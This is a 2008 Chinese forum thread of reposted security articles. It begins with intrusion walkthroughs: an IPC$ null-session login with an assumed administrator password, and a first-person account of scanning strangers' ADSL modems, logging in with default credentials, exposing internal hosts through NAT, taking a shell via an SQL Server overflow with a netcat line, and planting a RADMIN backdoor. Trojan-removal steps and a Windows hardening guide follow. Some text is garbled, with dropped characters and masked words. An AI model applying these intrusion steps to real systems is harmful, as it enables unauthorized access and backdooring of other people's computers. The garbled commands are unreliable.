这个命令将开始一次SYN的半开扫描,针对的目标是target.example.com所在的C类子网,它还试图确定在目标上运行的是什么操作系统。这个命令需要管理员权限,因为用到了半开扫描以及系统侦测。
发动攻击的第二步就是与对方建立连接,查找登录信息。现在假设通过扫描发现对方的机器建立有IPC$。IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要,在远程管理计算机和查看计算机的共享资源时都会用到。利用IPC$,黑客可以与对方建立一个空连接(无需用户名和密码),而利用这个空连接,就可以获得对方的用户列表。
第三步,使用合适的工具软件登录。打开命令行窗口,键入命令:net use 222.222.222.222ipc$ “administrator” /user 6
这里我们假设administrator的密码是123456。如果你不知道管理员密码,还需要找其他密码破解工具帮忙。登录进去之后,所有的东西就都在黑客的控制之下了。
防范方法
因为ADSL用户一般在线时间比较长,所以安全防护意识一定要加强。每天上网十几个小时,甚至通宵开机的人不在少数吧,而且还有人把自己的机器做成Web或者ftp服务器供其他人访问。日常的防范工作一般可分为下面的几个步骤来作。
步骤一,一定要把Guest帐号禁用。有很多入侵都是通过这个帐号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击“用户和密码”,选择“高级”选项卡。单击“高级”按钮,弹出本地用户和组窗口。在Guest帐号上面点击右键,选择属性,在“常规”页中选中“帐户已停用”。
步骤二,停止共享。Windows 2000***好之后,系统会创建一些隐藏的共享。点击开始→运行→cmd,然后在命令行方式下键入命令“net share”就可以查看它们。网上有很多关于IPC入侵的文章,都利用了默认共享连接。要禁止这些共享,打开管理工具→计算机管理→共享文件夹→共享,在相应的共享文件夹上按右键,点“停止共享”就行了。
步骤三,尽量关闭不必要的服务,如Terminal Services、IIS(如果你没有用自己的机器作Web服务器的话)、RAS(远程访问服务)等。还有一个挺烦人的Me enger服务也要关掉,否则总有人用消息服务发来网络广告。打开管理工具→计算机管理→服务和应用程序→服务,看见没用的就关掉。
步骤四,禁止建立空连接。在默认的情况下,任何用户都可以通过空连接连上服务器,枚举帐号并猜测密码。我们必须禁止建立空连接,方法有以下两种:
(1)修改注册表:
HKEY_Local_MachineSystemCurrent-ControlSetControlLSA
下,将DWORD值RestrictAnonymous的键值改成1。
(2)修改Windows 2000的本地安全策略:
设置“本地安全策略→本地策略→选项”中的RestrictAnonymous(匿名连接的额外限制)为“不容许枚举SAM账号和共享”。
步骤五,如果开放了Web服务,还需要对IIS服务进行安全配置:
(1) 更改Web服务主目录。右键单击“默认Web站点→属性→主目录→本地路径”,将“本地路径”指向其他目录。
(2) 删除原默认***的Inetpub目录。
(3) 删除以下虚拟目录: _vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、MSADC。
(4) 删除不必要的IIS扩展名映射。方法是:右键单击“默认Web站点→属性→主目录→配置”,打开应用程序窗口,去掉不必要的应用程序映射。如不用到其他映射,只保留.a 、.asa即可。
(5) 备份IIS配置。可使用IIS的备份功能,将设定好的IIS配置全部备份下来,这样就可以随时恢复IIS的安全配置。
不要以为这样就万事大吉,微软的操作系统我们又不是不知道,bug何其多,所以一定要把微软的补丁打全。
最后,建议大家选择一款实用的防火墙。比如Network ICE Corporation公司出品的Black ICE。它的***和运行十分简单,就算对网络安全不太熟悉也没有关系,使用缺省的配置就能检测绝大多数类型的黑客攻击。对于有经验的用户,还可以选择“Tools”中的“Advanced Firewall Settings”,来针对特定的IP地址或者UDP的特定端口进行接受或拒绝配置,以达到特定的防御效果。
marioshen
发表于 2008-5-23 10:17
黑客如何入侵穿透ADSL路由入侵内网(每日2篇-054)
也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得。
一.扫描
现在很多ADSL MODEM都是通过80、23、21三个端口来管理,但80、21端口有很多服务器都有打开,没什么特征性,于是我选择了23端口。打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了。开23的主机还真不少,我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pa :adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234),好了,一矢中的,现在我就是上帝。
二.映射
入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,其他的IP都是192.168.1.X,看DHCP分配表和流量统计可以知道内网的什么IP在用。但是192.168.1.2到底开放了什么端口,我们根本就不知道啊。呵呵,既然不知道,那么我就把他整台主机透明地映射到外网。具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192.168.1.X,到此192.168.1.X已经透明地映射到192.168.1.1上,我们访问ADSL MODEM就等于访问主机192.168.1.X了。
三.检测漏洞
现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139、1433等,刚才只是开放了80、23、21而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低啊。
四.溢出
既然没有弱口令,也没开80,那只好从逸出方面着手了,但没开80、21也就webdav .sevr-u的溢出没戏了,很自然,我向导了RPC溢出,但实践证明RPC溢出也是不行的,LSASS溢出也不行
五.募然回首,那人却在,灯火阑珊处
看来这个管理员还是比较负责的,该打的补丁都打上了。这时侯,我的目光转移到1433上了(嘿,不知道他打了SQL补丁没有?,心动不如行动,现在只好死马当活马医了,于是:
nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99
这样就成功得到一个shell了。
六.设置后门
到这里,我们的入侵已经成功了,余下的是扫尾留后门,至于后门,我一般都是用FTP上传RADMIN上去的,呵呵,这里不详谈了,相信各位都知道。
发表于 2008-5-24 14:18
太有用了
smart3503
发表于 2008-5-24 22:57
看不大懂,太菜了啊 [s:31] ,但想学习
发表于 2008-5-24 23:25
[s:30] ,除了感谢。。。还是感谢。。。
marioshen
发表于 2008-5-28 15:55
104种清除木马的方法(每日2篇-055)
1. 冰河v1.1 v2.2
冰河是国产最好的木马
清除木马v1.1
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
查找以下的两个路径,并删除
C:\windows\system\ kernel32.exe
C:\windows\system\ sy~plr.exe
关闭Regedit
重新启动到MSDOS方式
删除C:\windows\system\ kernel32.exe和C:\windows\system\ sy~plr.exe木马程序
重新启动。OK
清除木马v2.2
服务器程序、路径用户是可以随意定义,写入注册表的键名也可以自己定义。
因此,不能明确说明。
你可以察看注册表,把可疑的文件路径删除。
重新启动到MSDOS方式
删除于注册表相对应的木马程序
重新启动Windows。OK
2. Acid Battery v1.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Explorer =C:\WINDOWS\expiorer.exe
关闭Regedit
重新启动到MSDOS方式
删除c:\windows\expiorer.exe木马程序
注意:不要删除正确的ExpLorer.exe程序,它们之间只有i与L的差别。
重新启动。OK
3. Acid Shiver v1.0 + 1.0Mod + lmacid
清除木马的步骤:
重新启动到MSDOS方式
删除C:\windows\MSGSVR16.EXE
然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Explorer = C:\WINDOWS\MSGSVR16.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
删除右边的Explorer = C:\WINDOWS\MSGSVR16.EXE
关闭Regedit
重新启动。OK
重新启动到MSDOS方式
删除C:\windows\wintour.exe然后回到Windows系统
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Wintour = C:\WINDOWS\WINTOUR.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
删除右边的Wintour = C:\WINDOWS\WINTOUR.EXE
关闭Regedit
重新启动。OK
4. Ambush
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的zka = zcn32.exe
关闭Regedit
重新启动到MSDOS方式
删除C:\Windows\ zcn32.exe
重新启动。OK
5. AOL Trojan
清除木马的步骤:
启动到MSDOS方式
删除C:\ command.exe(删除前取消文件的隐含属性)
注意:不要删除真的command.com文件。
删除C:\ americ~1.0\buddyl~1.exe(删除前取消文件的隐含属性)
删除C:\ windows\system\norton~1\regist~1.exe(删除前取消文件的隐含属性)
打开WIN.INI文件
在[WINDOWS]下面run=和load=都加载者特洛伊木马程序的路径,必须清除它们:
保存WIN.INI
还要改正注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的WinProfile = c:\command.exe
关闭Regedit,重新启动Windows。OK
6. Asylum v0.1, 0.1.1, 0.1.2, 0.1.3 + Mini 1.0, 1.1
清除木马的步骤:
注意:木马程序默认文件名是wincmp32.exe,然而程序可以随意改变文件名。
我们可以根据木马修改的system.ini和win.ini两个文件来清除木马。
打开system.ini文件
在[BOOT]下面有个" hell=文件名。正确的文件名是explorer.exe
如果不是explorer.exe,那么那个文件就是木马程序,把它查找出来,删除。
保存退出system.ini
打开win.ini文件
在[WINDOWS]下面有个run=
如果你看到=后面有路径文件名,必须把它删除。
正确的应该是run=后面什么也没有。
=后面的路径文件名就是木马,把它查找出来,删除。
保存退出win.ini。
7. AttackFTP
清除木马的步骤:
打开win.ini文件
在[WINDOWS]下面有load=wscan.exe
删除wscan.exe ,正确是load=
保存退出win.ini。
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Reminder=wscan.exe / quot;
关闭Regedit,重新启动到MSDOS系统中
删除C:\windows\system\ wscan.exe
8. Back Co truction 1.0 - 2.5
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的C:\WINDOWS\Cmctl32.exe
关闭Regedit,重新启动到MSDOS系统中
删除C:\WINDOWS\Cmctl32.exe
9. BackDoor v2.00 - v2.03
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的‘c:\windows\notpa.exe /o=yes‘
关闭Regedit,重新启动到MSDOS系统中
删除c:\windows\notpa.exe
注意:不要删除真正的notepad.exe笔记本程序
10. BF Evolution v5.3.12
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的(Default)=
关闭Regedit,再次重新启动计算机。
将C:\windows\system\ .exe(空格exe文件)
11. BioNet v0.84 - 0.92 + 2.21
0.8X版本是运行在Win95/98
0.9X以上版本有运行在Win95/98 和WinNT上两个软件
客户-服务器协议是一样的,因而NT客户能黑95/98被感染的机器,和Win95/98客户能黑NT被感染的系统完全一样。
清除木马的步骤:
首先准备一张98的启动盘,用它启动后,进入c:\windows目录下,用attrib libupd~1.exe -h
命令让木马程序可见,然后删除它。
抽出软盘后重新启动,进入98下,在注册表里找到:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
的子键WinLibUpdate = c:\windows\libupdate.exe -hide
将此子键删除。
12. Bla v1.0 - 5.03
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的Systemdoor = C:\WINDOWS\System\mprdll.exe
关闭Regedit,重新启动计算机。
查找到C:\WINDOWS\System\mprdll.exe和
C:\WINDOWS\system\rundll.exe
注意:不要删除C:\WINDOWS\RUNDLL.EXE正确文件。
并删除两个文件。
13. BladeRu er
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
可以找到System-Tray = c:\something\something.exe
右边的路径可能是任何东西,这时你不需要删除它,因为木马会立即自动加上,你需要的是记下木马的名字与目录,然后退回到MS-DOS下,找到此木马文件并删除掉。
重新启动计算机,然后重复第一步,在注册表中找到木马文件并删除此键。
14. Bobo v1.0 - 2.0
清除木马v1.0
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除右边的DirrectLibrarySu ort =C:\WINDOWS\SYSTEM\Dllclient.exe
关闭Regedit,重新启动计算机。
DEL C:\Windows\System\Dllclient.exe
清除木马v2.0
打开注册表Regedit
点击目录至:
HKEY_USER/.Default/Software/Mirabilis/ICQ/Agent/A /ICQ Accel/
ICQ Accel是一个“假象“的主键,选中ICQ Accel主键并把它删除。
重新启动计算机。OK
15. BrainSpy vBeta
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
右边有 ??? = C:\WINDOWS\system\BRAINSPY .exe
???标签选是随意改变的。
关闭Regedit,重新启动计算机
查找删除C:\WINDOWS\system\BRAINSPY .exe
16. Cain and Abel v1.50 - 1.51
这是一个口令木马
进入MS-DOS方式
查找到C:\windows\msabel32.exe
并删除它。OK
17. Cana on
清除木马的步骤:
打开WIN.INI文件
查找c:\msie5.exe,删除全部主键
保存win.ini
重新启动计算机
删除c:\msie5.exe木马文件
18. Chupachbra
清除木马的步骤:
打开WIN.INI文件
[Windows]的下面有两个行
run=wi rot.exe
load=wi rot.exe
删除wi rot.exe
保存Win.ini,再打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的‘System Protect‘ = wi rot.exe
重新启动Windows
查找到C:\windows\system\ wi rot.exe,并删除。
19. Coma v1.09
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的‘RunTime‘ = C:\windows\msgsrv36.exe
重新启动Windows
查找到C:\windows\ msgsrv36.exe,并删除。
20. Control
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的Load MSchv Drv = C:\windows\system\MSchv.exe
保存Regedit,重新启动Windows
查找到C:\windows\system\MSchv.exe,并删除。
21. Dark Shadow
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\RunServices
删除右边的winfunctio =winfunctio .exe
保存Regedit,重新启动Windows
查找到C:\windows\system\ winfunctio .exe,并删除。
22. DeepThroat v1.0 - 3.1 + Mod (Foreplay)
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
版本1.0
删除右边的项目‘System32‘=c:\windows\system32.exe
版本2.0-3.1
删除右边的项目‘SystemTray‘ = ‘Systray.exe‘
保存Regedit,重新启动Windows
版本1.0删除c:\windows\system32.exe
版本2.0-3.1
删除c:\windows\system\systray.exe
23. Delta Source v0.5 - 0.7
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的项目:DS admin tool = C:\TEMPSERVER.exe
保存Regedit,重新启动Windows
查找到C:\TEMPSERVER.exe,并删除它。
24. Der Spaeher v3
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
删除右边的项目:explore = c:\windows\system\dkbdll.exe
保存Regedit,重新启动Windows
删除c:\windows\system\dkbdll.exe木马文件。
25. Doly v1.1 - v1.7 (SE)
清除木马V1.1-V1.5版本:
这几个木马版本的木马程序放在三处,增加二个注册项目,还增加到Win.ini项目。
首先,进入MS-DOS方式,删除三个木马程序,但V1.35版本多一个木马文件mdm.exe。
把下列各项全部删除:
C:\WINDOWS\SYSTEM\tesk.sys
C:\WINDOWS\Start Menu\Programs\Startup\mstesk.exe
c:\Program Files\MStesk.exe
c:\Program Files\Mdm.exe
重新启动Windows。
接着,打开win.ini文件
找到[WINDOWS]下面load=c:\windows\system\tesk.exe项目,删除路径,改变为load=
保存win.ini文件。
最后,修改注册表Regedit
找到以下两个项目并删除它们
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Ms tesk = C:\Program Files\MStesk.exe
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
Ms tesk = C:\Program Files\MStesk.exe
再寻找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ 这个组是木马的全部参数选择和设置的服务器,删除这个 组的全部项目。
关闭保存Regedit。
还有打开C:\AUTOEXEC.BAT文件,删除
@echo off copy c:\sys.lon c:\windows\StartMenu\Startup Items\
del c:\win.reg
关闭保存autoexec.bat。
清除木马V1.6版本:
该木马运行时,将不能通过98的正常操作关闭,只能RESET键。彻底清除步骤如下:
1.打开控制面板——添加删除程序——删除memory manager 3.0,这就是木马程序,但是它并不会把木马的EXE文件删除掉。
2.用98或DOS启动盘启动(用RESET键)后,转入C:\,编辑AUTOEXEC。BAT,把如下内容删除:
@echo off copy c:\sys.lon c:\windows\startm~1\programs\startup\mdm.exe
del c:\win.reg
保存AUTOEXEC。BAT文件并返回DOS后,在C:\根目录下删除木马文件:
del sys.lon
del windows\startm~1\programs\startup\mdm.exe
del progra~1\mdm.exe
3.抽出软盘重新启动,进入98后,把c:\program files\目录下的memory manager 目录删除。
清除木马V1.7版本:
首先,打开C:\AUTOEXEC.BAT文件,删除
@echo off copy c:\sys.lon c:\windows\startm~1\programs\startup\mdm.exe
del c:\win.reg
关闭保存autoexec.bat
然后打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\MicroSoft\Windows\CurrentVersion\Run
找到c:\windows\system\mdm.exe路径并删除这个项目
点击目录至:
HKEY_USER/.Default/Software/Marabilis/ICQ/Agent/A /
找到C:\windows\system\kernal32.exe路径并删除这个项目
关闭保存Regedit。重新启动Windows。
最后,删除以下木马程序:
c:\sys.lon
c:\iecookie.exe
c:\windows\start menu\programs\startup\mdm.exe
c:\program files\mdm.exe
c:\windows\system\mdm.exe
c:\windows\system\kernal32.exe
注意:kernal32是A
26. Donald Dick v1.52 - 1.55
清除木马V1.52-1.53版本:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\VxD\VMLDIR\
删除右边的项目:StaticVxD = vmldir.vxd
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\System\vmldir.vxd
清除木马V1.54-1.55版本:
这两个版本跟上面的版本只是默认文件名不同,其它都一样,
把vmldir.vxd改为intld.vdx即可。
27. Drat v1.0 - 3.0b
清除木马的步骤:
打开注册表Regedit
点击目录至:hkey_cla es_root\exefile\shell\open\command
找到@=SHELL32 \%1\ %*把它更改为@=%1 %*
关闭保存Regedit,重新启动Windows。
查找c:\windows\下shell32.*文件,并删除它。
28. Ecli e 2000
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:bybt = c:\windows\system\ecli e2000.exe
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ RunServices\
删除右边的项目:cksys = c:\windows\system\ could be anything .exe
关闭保存Regedit,重新启动Windows
查找到ecli e2000.exe木马文件,并删除
29. Ecly e v1.0
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
删除右边的项目:Rnaa =C:\WINDOWS\SYSTEM\rmaa .exe
关闭保存Regedit,重新启动Windows
删除C:\WINDOWS\SYSTEM\rmaa .exe
注意:不要删除Rnaa .exe
30. Executer v1
清除木马的步骤:
打开注册表Regedit
点击目录至:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
在右边的项目查找到C:\windows\~ec.exe,并删除。
关闭保存Regedit,重新启动Windows
相应删除木马程序文件。
marioshen
发表于 2008-5-28 15:57
病毒木马完整防护教程(每日2篇-056)
(一)、个人电脑常见的被入侵方式
谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了以下几种:
(1) 被他人盗取密码;
(2) 系统被木马攻击;
(3) 浏览网页时被恶意的java scrpit程序攻击;
(4) QQ被攻击或泄漏信息;
(5) 病毒感染;
(6) 系统存在漏洞使他人攻击自己。
(7) 黑客的恶意攻击。
下面我们就来看看通过什么样的手段来更有效的防范攻击。
1.察看本地共享资源
运行CMD输入net share,如果看到有异常的共享,那么应该关闭。但是有时你关闭共享下次开机的时候又出现了,那么你应该考虑一下,你的机器是否已经被黑客所控制了,或者中了病毒。
2.删除共享(每次输入一个)
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3.删除ipc$空连接
在运行内输入regedit,在注册表中找到 HKEY-LOCAL_MACHINESYSTEMCurrentControSetControlLSA 项里数值名称RestrictAnonymous的数值数据由0改为1。
4.关闭自己的139端口,ipc和RPC漏洞存在于此。
关闭139端口的方法是在“网络和拨号连接”中“本地连接”中选取“Internet协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WinS设置”里面有一项“禁用TCP/IP的NETBIOS”,打勾就关闭了139端口。
5.防止rpc漏洞
打开管理工具——服务——找到RPC(Remote Procedure Call (RPC) Locator)服务——将故障恢复中的第一次失败,第二次失败,后续失败,都设置为不操作。
XP SP2和2000 pro 4,均不存在该漏洞。
6.445端口的关闭
修改注册表,添加一个键值
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个SMBDeviceEnabled 为REG_DWORD类型键值为 0这样就ok了
7.3389的关闭
XP:我的电脑上点右键选属性--远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。
Win2000server 开始--程序--管理工具--服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。(该方法在XP同样适用)
使用2000 pro的朋友注意,网络上有很多文章说在Win2000pro 开始--设置--控制面板--管理工具--服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务,可以关闭3389,其实在2000pro 中根本不存在Terminal Services。
8.4899的防范
网络上有许多关于3389和4899的入侵方法。4899其实是一个远程控制软件所开启的服务端端口,由于这些控制软件功能强大,所以经常被黑客用来控制自己的肉鸡,而且这类软件一般不会被杀毒软件查杀,比后门还要安全。
4899不象3389那样,是系统自带的服务。需要自己***,而且需要将服务端上传到入侵的电脑并运行服务,才能达到控制的目的。
所以只要你的电脑做了基本的安全配置,黑客是很难通过4899来控制你的。
9、禁用服务
打开控制面板,进入管理工具——服务,关闭以下服务
1.Alerter[通知选定的用户和计算机管理警报]
2.ClipBook[启用“剪贴簿查看器”储存信息并与远程计算机共享]
3.Distributed File System[将分散的文件共享合并成一个逻辑名称,共享出去,
关闭后远程计算机无法访问共享
4.Distributed Link Tracking Server[适用局域网分布式链接? ?踪客户端服务]
5.Human Interface Device Acce [启用对人体学接口设备(HID)的通用输入访问]
6.IMAPI CD-Burning COM Service[管理 CD 录制]
7.Indexing Service[提供本地或远程计算机上文件的索引内容和属性,泄露信息]
8.Kerberos Key Distribution Center[授权协议登录网络]
9.Lice e Logging[监视IIS和SQL如果你没***IIS和SQL的话就停止]
10.Me enger[警报]
11.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客户信息收集]
12.Network DDE[为在同一台计算机或不同计算机上运行的程序提供动态数据交换]
13.Network DDE DSDM[管理动态数据交换 (DDE) 网络共享]
14.Print Spooler[打印机服务,没有打印机就禁止吧]
15.Remote Desktop Hel am Se ion Manager[管理并控制远程协助]
16.Remote Registry[使远程计算机用户修改本地注册表]
17.Routing and Remote Acce [在局域网和广域往提供路由服务.黑客理由路由服务刺探注册信息]
18.Server[支持此计算机通过网络的文件、打印、和命名管道共享]
19.Special Administration Co ole Helper[允许管理员使用紧急管理服务远程访问命令行提示符]
20.TCP/IPNetBIOS Helper[提供 TCP/IP 服务上的 NetBIOS 和网络上客户端的 NetBIOS 名称解
析的支持而使用户能够共享文件、打印和登录到网络]
21.Telnet[允许远程用户登录到此计算机并运行程序]
22.Terminal Services[允许用户以交互方式连接到远程计算机]
23.Window s Image Acquisition (WIA)[照相服务,应用与数码摄象机]
如果发现机器开启了一些很奇怪的服务,如r_server这样的服务,必须马上停止该服务,因为这完全有可能是黑客使用控制程序的服务端。
10、账号密码的安全原则
首先禁用guest帐号,将系统内建的administrator帐号改名~~(改的越复杂越好,最好改成中文的),而且要设置一个密码,最好是8位以上字母数字符号组合。 (让那些该死的黑客慢慢猜去吧~)
如果你使用的是其他帐号,最好不要将其加进administrators,如果加入administrators组,一定也要设置一个足够安全的密码,同上如果你设置admi trator的密码时,最好在安全模式下设置,因为经我研究发现,在系统中拥有最高权限的帐号,不是正常登陆下的adminitrator帐号,因为即使有了这个帐号,同样可以登陆安全模式,将sam文件删除,从而更改系统的administrator的密码!而在安全模式下设置的administrator则不会出现这种情况,因为不知道这个administrator密码是无法进入安全模式。权限达到最大这个是密码策略:用户可以根据自己的习惯设置密码,下面是我建议的设置(关于密码安全设置,我上面已经讲了,这里不再罗嗦了。
打开管理工具.本地安全设置.密码策略
1.密码必须符合复杂要求性.启用
2.密码最小值.我设置的是8
3.密码最长使用期限.我是默认设置42天
4.密码最短使用期限0天
5.强制密码历史 记住0个密码
6.用可还原的加密来存储密码 禁用
11、本地策略:
这个很重要,可以帮助我们发现那些心存叵测的人的一举一动,还可以帮助我们将来追查黑客。
(虽然一般黑客都会在走时会清除他在你电脑中留下的痕迹,不过也有一些不小心的)
打开管理工具,找到本地安全设置.本地策略.审核策略
1.审核策略更改 成功失败
2.审核登陆事件 成功失败
3.审核对象访问 失败
4.审核跟踪过程 无审核
5.审核目录服务访问 失败
6.审核特权使用 失败
7.审核系统事件 成功失败
8.审核帐户登陆时间 成功失败
9.审核帐户管理 成功失败
&am 然后再到管理工具找到
事件查看器
应用程序:右键属性设置日志大小上限,我设置了50mb,选择不覆盖事件
安全性:右键属性设置日志大小上限,我也是设置了50mb,选择不覆盖事件
系统:右键属性设置日志大小上限,我都是设置了50mb,选择不覆盖事件
12、本地安全策略:
打开管理工具
找到本地安全设置.本地策略.安全选项
1.交互式登陆.不需要按 Ctrl+Alt+Del 启用 [根据个人需要,?
但是我个人是不需要直接输入密码登陆的]
2.网络访问.不允许SAM帐户的匿名枚举 启用
3.网络访问.可匿名的共享 将后面的值删除
4.网络访问.可匿名的命名管道 将后面的值删除
5.网络访问.可远程访问的注册表路径 将后面的值删除
6.网络访问.可远程访问的注册表的子路径 将后面的值删除
7.网络访问.限制匿名访问命名管道和共享
8.帐户.(前面已经详细讲过拉 )
13、用户权限分配策略:
打开管理工具
找到本地安全设置.本地策略.用户权限分配
1.从网络访问计算机 里面一般默认有5个用户,除Admin外我们删除4个,
当然,等下我们还得建一个属于自己的ID
2.从远程系统强制关机,Admin帐户也删除,一个都不留
3.拒绝从网络访问这台计算机 将ID删除
4.从网络访问此计算机,Admin也可删除,如果你不使用类似3389服务
5.通过远端强制关机。删掉
14、终端服务配置
打开管理工具
终端服务配置
1.打开后,点连接,右键,属性,远程控制,点不允许远程控制
2.常规,加密级别,高,在使用标准Windows验证上点√!
3.网卡,将最多连接数上设置为0
4.高级,将里面的权限也删除.[我没设置]
再点服务器设置,在Active Desktop上,设置禁用,且限制每个使用一个会话
15、用户和组策略
打开管理工具
计算机管理.本地用户和组.用户;
删除Su ort_388945a0用户等等,只留下你更改好名字的adminisrator权限
计算机管理.本地用户和组.组
组.我们就不分组了,没必要吧
16、自己动手DIY在本地策略的安全选项
1)当登陆时间用完时自动注销用户(本地) 防止黑客密码渗透.
2)登陆屏幕上不显示上次登陆名(远程)如果开放3389服务,别人登陆时,
就不会残留有你登陆的用户名.让他去猜你的用户名去吧.
3)对匿名连接的额外限制
4)禁止按 alt+crtl +del(没必要)
5)允许在未登陆前关机[防止远程关机/启动、强制关机/启动]
6)只有本地登陆用户才能访问cd-rom
7)只有本地登陆用户才能访问软驱
8)取消关机原因的提示
A、打开控制面板窗口,双击“电源选项”图标,在随后出现的电源属性窗口中,进入到“高
级”标签页面;
B、在该页面的“电源按钮”设置项处,将“在按下计算机电源按钮时”设置为“关机”,
单击“确定”按钮,来退出设置框;
C、以后需要关机时,可以直接按下电源按键,就能直接关闭计算机了。当然,
我们也能启用休眠功能键,来实现快速关机和开机;
D、要是系统中没有启用休眠模式的话,可以在控制面板窗口中,打开电源选项,
进入到休眠标签页面,并在其中将“启用休眠”选项选中就可以了。
9)禁止关机事件跟踪
开始“Start -”运行“ Run -输入”gpedit.msc “,在出现的窗口的左边部分,选择 ”计算
机配置“(Computer Configuration )- ”管理模板“(Administrative Templates)- ”系统
“(System),在右边窗口双击“Shutdown Event Tracker” 在出现的对话框中选择“禁止”
(Disabled),点击然后“确定”(OK)保存后退出这样,你将看到类似于Windows 2000的关机窗口。
17、避免被恶意代码 木马等病毒攻击
我们只需要在系统中***杀毒软件,如:卡巴基斯,瑞星,金山毒霸等。
